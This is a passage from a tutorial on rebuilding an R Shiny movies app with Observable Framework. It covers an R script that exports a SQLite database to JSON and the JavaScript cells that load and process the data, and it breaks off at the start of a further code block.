&lt;details open&gt;&lt;summary&gt;src/data/movies.json.R&lt;/summary&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-R" data-lang="R"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(dplyr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(RSQLite)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(dbplyr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Hack to find the database path&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;script_directory &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gsub&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;--file=&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;commandArgs&lt;/span&gt;()[4])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;db_path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;file.path&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dirname&lt;/span&gt;(script_directory), &lt;span style="color:#a5d6ff"&gt;&amp;#34;movies.db&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Updated code to no longer use deprecated function&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conn &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dbConnect&lt;/span&gt;(RSQLite&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;SQLite&lt;/span&gt;(), db_path)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;omdb &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tbl&lt;/span&gt;(conn, &lt;span style="color:#a5d6ff"&gt;&amp;#34;omdb&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tomatoes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tbl&lt;/span&gt;(conn, &lt;span style="color:#a5d6ff"&gt;&amp;#34;tomatoes&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Removed films without a BoxOffice value&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Select only the variables we actually use&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;all_movies &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;inner_join&lt;/span&gt;(omdb, tomatoes, by &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;ID&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(Reviews &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.na&lt;/span&gt;(BoxOffice)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(Title, Runtime, Genre, Released, Director, Oscars,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Rating &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Rating.y, Meter, Reviews, BoxOffice, Cast)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Convert data to a JSON string&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;json &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; all_movies &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;collect&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; jsonlite&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;toJSON&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Tidy up database connection&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dbDisconnect&lt;/span&gt;(conn)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Print data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;print&lt;/span&gt;(json)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/details&gt;
&lt;p&gt;If you followed the server.R code from the original Shiny app then hopefully most of these changes make sense. The exception is probably the &amp;ldquo;Hack to find the database path&amp;rdquo;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-R" data-lang="R"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;script_directory &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gsub&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;--file=&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;commandArgs&lt;/span&gt;()[4])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;db_path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;file.path&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dirname&lt;/span&gt;(script_directory), &lt;span style="color:#a5d6ff"&gt;&amp;#34;movies.db&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I know I&amp;rsquo;ve put the database in the same directory as my R script, but the script needs to know the path relative to where it&amp;rsquo;s executed from, and that isn&amp;rsquo;t obvious at this point. We can, however, find the path from the execution location to the script using the &lt;code&gt;commandArgs&lt;/code&gt; function: when a script is run with Rscript, one of the elements it returns (the fourth, in the code above) has the form &lt;code&gt;--file=&lt;/code&gt; followed by the path to the script. The rest is just some ugly code that strips the &lt;code&gt;--file=&lt;/code&gt; prefix to leave the script path (stored, despite its name, in &lt;code&gt;script_directory&lt;/code&gt;) and then replaces the script file name with the database file name that we know lives in the same directory.&lt;/p&gt;
&lt;aside&gt;
&lt;p&gt;Since writing this code, it&amp;rsquo;s been pointed out to me that a cleaner solution is to use &lt;code&gt;here::here&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-R" data-lang="R"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;db_path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; here&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;here&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;src&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;data&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;movies.db&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The downside is that the documentation for the function states that the &amp;ldquo;package is intended for interactive use only&amp;rdquo;, so use it at your own risk.&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;We can test our script by installing dplyr, RSQLite, dbplyr and jsonlite (which the script calls via &lt;code&gt;jsonlite::toJSON&lt;/code&gt;) as necessary and then running (from the root of the project):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-sh" data-lang="sh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Rscript src/data/movies.json.R &amp;gt; movies.json
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This will create a JSON file, movies.json, containing our data in the root of the project. You can delete this file afterwards as it&amp;rsquo;s not needed.&lt;/p&gt;
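&lt;p&gt;If you would like a quick sanity check of the generated JSON before deleting it, something along the lines of the following sketch could be run with Node. The &lt;code&gt;missingFields&lt;/code&gt; helper and the sample records are made up for illustration; the field list simply mirrors the &lt;code&gt;select&lt;/code&gt; call in movies.json.R. It assumes the file parses to an array of row objects, which is how jsonlite converts a data frame by default.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;// Fields we expect, mirroring the select() call in movies.json.R
const expectedFields = ['Title', 'Runtime', 'Genre', 'Released', 'Director',
  'Oscars', 'Rating', 'Meter', 'Reviews', 'BoxOffice', 'Cast'];

// Hypothetical helper: return the names of fields that appear in no record.
// By default jsonlite leaves NA values out of a row, so a field can be
// absent from an individual record without anything being wrong.
function missingFields(records, fields) {
  return fields.filter(function (field) {
    return !records.some(function (record) {
      return Object.prototype.hasOwnProperty.call(record, field);
    });
  });
}

// Made-up records standing in for the parsed contents of movies.json
const sampleRecords = [
  {Title: 'Example A', Runtime: 100, Genre: 'Drama', Released: '2001-01-01',
    Director: 'Someone', Oscars: 0, Rating: 6.1, Meter: 70, Reviews: 12,
    BoxOffice: 1500000, Cast: 'A, B'},
  {Title: 'Example B', Runtime: 95, Oscars: 1, Meter: 88, Reviews: 40,
    BoxOffice: 250000}
];

// An empty array means every expected field turned up at least once
console.log(missingFields(sampleRecords, expectedFields));
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;To check the real output you would swap the sample for the parsed file, for example by reading it with Node&amp;rsquo;s &lt;code&gt;fs.readFileSync&lt;/code&gt; and passing the result to &lt;code&gt;JSON.parse&lt;/code&gt;.&lt;/p&gt;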
&lt;p&gt;We also no longer need the initial files in the &amp;ldquo;src/data&amp;rdquo; directory — events.json and launches.csv.js — and can delete them.&lt;/p&gt;
&lt;p&gt;That&amp;rsquo;s everything we want to do in R covered. Now to actually build the movies app.&lt;/p&gt;
&lt;code class="switch"&gt;
git switch --detach data
&lt;/code&gt;
&lt;h2 id="the-markdown-file"&gt;The Markdown File&lt;/h2&gt;
&lt;p&gt;For a simple app made of a single page the expectation is that the content of the app is placed inside a markdown file called index.md directly inside the &amp;ldquo;src&amp;rdquo; directory of the project. This already exists in our generated project, alongside a couple of other markdown files that we can safely delete.&lt;/p&gt;
&lt;p&gt;So now we write the &amp;ldquo;content&amp;rdquo; of our app in the index.md file in place of the original content we generated in the &amp;ldquo;Getting Started&amp;rdquo; section. As it is a markdown file, you may think this would end up containing a load of markdown syntax. It turns out that in our case the file mostly looks like blocks of JavaScript… because that&amp;rsquo;s what it is.&lt;/p&gt;
&lt;p&gt;The page starts, however, with explicit HTML markup: &lt;code&gt;&amp;lt;h1&amp;gt;&amp;lt;/h1&amp;gt;&lt;/code&gt;. That&amp;rsquo;s because Observable Framework automatically turns headings created using # markdown syntax into anchor points (i.e. links to that specific part of the page). This is useful for writing &amp;ldquo;Help&amp;rdquo; or other documentation, as you can easily link to specific parts of the page, but isn&amp;rsquo;t particularly useful here.&lt;/p&gt;
&lt;p&gt;As already noted, most of the markdown file consists of &amp;ldquo;fenced&amp;rdquo; blocks of JavaScript using the syntax ```js&amp;hellip;```. The critical thing to understand here is that these blocks are actually executed in the browser; they are not simply there to display code to the user. Framework is reactive by default and the bit I had (and still have, if we&amp;rsquo;re honest) to get my head around is that each fenced block forms a &amp;ldquo;cell&amp;rdquo;. The thing that made most sense to me was thinking of cells in Excel: you change the value in a cell and the &lt;a href="https://observablehq.com/@observablehq/how-observable-runs" rel="external"&gt;values of other cells that depend on it automatically update&lt;/a&gt; regardless of where the cell is positioned in the two-dimensional grid of the spreadsheet.&lt;/p&gt;
&lt;p&gt;Still, with Framework, I&amp;rsquo;m not sure how much &amp;ldquo;stuff&amp;rdquo; should go in a single cell: What is the best practice here? Does it matter so long as the output is correct in terms of both value and position on the page? Is there any significant effect on performance? How do the answers to the previous questions change when we go from creating notebooks to creating dashboards?&lt;/p&gt;
&lt;p&gt;My current thinking on this can be summarised roughly as &amp;ldquo;create blocks of stuff that looks like it goes together and seems to work, with some cells dealing with the UI and some cells responsible for the graphic&amp;rdquo;. So let&amp;rsquo;s cover each block/cell in turn.&lt;/p&gt;
&lt;h3 id="building-the-ui"&gt;Building the UI&lt;/h3&gt;
&lt;p&gt;The first cell covers the loading of the data and some basic processing of it:&lt;/p&gt;
&lt;div class="resizable"&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// Load the data from the file we generated
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; movies &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;await&lt;/span&gt; FileAttachment(&lt;span style="color:#a5d6ff"&gt;&amp;#39;./data/movies.json&amp;#39;&lt;/span&gt;).json();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// Sort the data by number of oscars won. This ends up putting the
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// multi-oscar-winning movies at the end of the data array so that
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// they get drawn last in our scatter plot and thus appear on top
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;movies.sort((a, b) =&amp;gt; a.Oscars &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; b.Oscars);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// Modify/extend our data objects for easier future use
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;movies.forEach(&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(d) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Add a Boolean stating whether or not the movie won any Oscars
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; d.OscarWinner &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; d.Oscars &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Convert the release date string to a JS Date object
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; d.Released &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;new&lt;/span&gt; Date(d.Released);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Add a property that is just the four-digit year of release
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; d.YearReleased &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; d.Released.getFullYear();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Add an array of Genres and remove any excess whitespace
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; d.Genres &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; d.Genre&lt;span style="color:#ff7b72;font-weight:bold"&gt;?&lt;/span&gt;.split(&lt;span style="color:#a5d6ff"&gt;&amp;#39;,&amp;#39;&lt;/span&gt;).map(s =&amp;gt; s.trim()) &lt;span style="color:#ff7b72;font-weight:bold"&gt;||&lt;/span&gt; [];
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Convert the Director string to lowercase for simpler searching
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; d.Director &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; d.Director&lt;span style="color:#ff7b72;font-weight:bold"&gt;?&lt;/span&gt;.toLowerCase() &lt;span style="color:#ff7b72;font-weight:bold"&gt;||&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Convert the Cast string to lowercase for simpler searching
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; d.Cast &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; d.Cast&lt;span style="color:#ff7b72;font-weight:bold"&gt;?&lt;/span&gt;.toLowerCase() &lt;span style="color:#ff7b72;font-weight:bold"&gt;||&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Turn the BoxOffice revenue figures into millions of dollars
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; d.BoxOffice &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; (d.BoxOffice &lt;span style="color:#ff7b72;font-weight:bold"&gt;||&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1e6&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;});
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// Create an array containing all the different genres found in the
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// dataset and sort alphabetically
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; genres &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Array.from(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; movies.reduce(&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(set, d) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; d.Genres.forEach(g =&amp;gt; set.add(g));
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; set;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }, &lt;span style="color:#ff7b72"&gt;new&lt;/span&gt; Set())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;.sort((a, b) =&amp;gt; a.localeCompare(b));
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// Extract a two-element array giving the earliest and latest
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// release years of films in the dataset
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; yearExtent &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; d3.extent(movies, d =&amp;gt; d.YearReleased);
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;Most of this is &amp;ldquo;vanilla&amp;rdquo; JavaScript but there are a couple of functions that aren&amp;rsquo;t: &lt;code&gt;FileAttachment&lt;/code&gt; and &lt;code&gt;d3.extent&lt;/code&gt;. &lt;a href="https://observablehq.com/documentation/data/files/file-attachments" rel="external"&gt;&lt;code&gt;FileAttachment&lt;/code&gt;&lt;/a&gt; is a function created specifically for Observable notebooks that also works with Observable Framework. It simplifies the code required to load data files like JSON, CSV and XLSX. It doesn&amp;rsquo;t need to be explicitly &lt;code&gt;import&lt;/code&gt;ed into a Framework markdown file. The same is true of &lt;a href="https://d3js.org/d3-array/summarize#extent" rel="external"&gt;&lt;code&gt;d3.extent&lt;/code&gt;&lt;/a&gt; (and all other methods of the d3 library). This method takes an input array of data and an &amp;ldquo;accessor function&amp;rdquo; that is applied to each element of the array. The return value is then a two-element array of the minimum and maximum values returned when the accessor function is applied to each element of the input array.&lt;/p&gt;
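&lt;p&gt;To make that return value concrete, here is a minimal sketch of the same idea in vanilla JavaScript. The &lt;code&gt;extentSketch&lt;/code&gt; helper and the sample records are made up for illustration and only handle numbers; this is not how d3 itself implements &lt;code&gt;d3.extent&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;// Hypothetical stand-in for d3.extent, for illustration only
function extentSketch(data, accessor) {
  // Apply the accessor to every element and keep only finite numbers
  const values = data
    .map(function (d) { return accessor(d); })
    .filter(function (v) { return Number.isFinite(v); });
  // With nothing left to compare, both ends are undefined
  if (values.length === 0) return [undefined, undefined];
  // Otherwise return the minimum and maximum as a two-element array
  return [Math.min.apply(null, values), Math.max.apply(null, values)];
}

// Made-up records using the YearReleased property added in the first cell
const sampleYears = [{YearReleased: 2001}, {YearReleased: 1987}, {YearReleased: 2014}];

// Logs the two-element array containing 1987 and 2014
console.log(extentSketch(sampleYears, function (d) { return d.YearReleased; }));
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In the app itself there is no need for a helper like this, since &lt;code&gt;d3.extent(movies, d =&amp;gt; d.YearReleased)&lt;/code&gt; does the same job in one call.&lt;/p&gt;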
&lt;aside&gt;
&lt;p&gt;&lt;code&gt;d3.extent&lt;/code&gt; finds the two values that, as I was taught at school, are used to calculate the &amp;ldquo;range&amp;rdquo; of a one-dimensional dataset. Confusingly, d3 also has a &lt;a href="https://observablehq.com/@d3/d3-range" rel="external"&gt;&lt;code&gt;range&lt;/code&gt; method&lt;/a&gt; that does something entirely different: it creates a sequence of numbers. This is particularly confusing if you use d3&amp;rsquo;s &lt;a href="https://observablehq.com/@d3/d3-scalelinear" rel="external"&gt;&lt;code&gt;scaleLinear&lt;/code&gt;&lt;/a&gt; method, which returns a function with its own &lt;code&gt;range&lt;/code&gt; method.&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;The second JavaScript cell creates some not especially interesting utility functions and an array of objects that are used later on in the construction of the controls and graphics. This is all vanilla JavaScript.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// Create function for defining a middle grey of varying opacity
